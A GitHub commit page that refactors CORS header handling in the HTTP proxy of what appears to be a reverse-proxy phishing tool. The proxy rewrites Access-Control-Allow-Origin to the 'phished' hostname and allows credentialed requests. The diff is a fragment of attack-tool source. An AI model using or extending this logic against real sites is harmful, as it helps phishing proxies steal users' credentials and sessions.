Skip to content

Commit

Permalink
small tweak to handle Access-Control-Allow-Origin header
Browse files Browse the repository at this point in the history
  • Loading branch information
@kgretzky
kgretzky committed Feb 2, 2021
1 parent 5fc43f4 commit 09e78a9
Showing 1 changed file with 6 additions and 9 deletions.
15 changes: 6 additions & 9 deletions core/http_proxy.go
View file
Original file line number Diff line number Diff line change
Expand Up @@ -606,16 +606,13 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
}

allow_origin := resp.Header.Get("Access-Control-Allow-Origin")
if allow_origin != "" {
if allow_origin != "*" {
if u, err := url.Parse(allow_origin); err == nil {
if o_host, ok := p.replaceHostWithPhished(u.Host); ok {
resp.Header.Set("Access-Control-Allow-Origin", u.Scheme+"://"+o_host)
}
} else {
log.Warning("can't parse URL from 'Access-Control-Allow-Origin' header: %s", allow_origin)
resp.Header.Set("Access-Control-Allow-Origin", "*")
if allow_origin != "" && allow_origin != "*" {
if u, err := url.Parse(allow_origin); err == nil {
if o_host, ok := p.replaceHostWithPhished(u.Host); ok {
resp.Header.Set("Access-Control-Allow-Origin", u.Scheme+"://"+o_host)
}
} else {
log.Warning("can't parse URL from 'Access-Control-Allow-Origin' header: %s", allow_origin)
}
resp.Header.Set("Access-Control-Allow-Credentials", "true")
}
Expand Down

0 comments on commit 09e78a9

Please sign in to comment.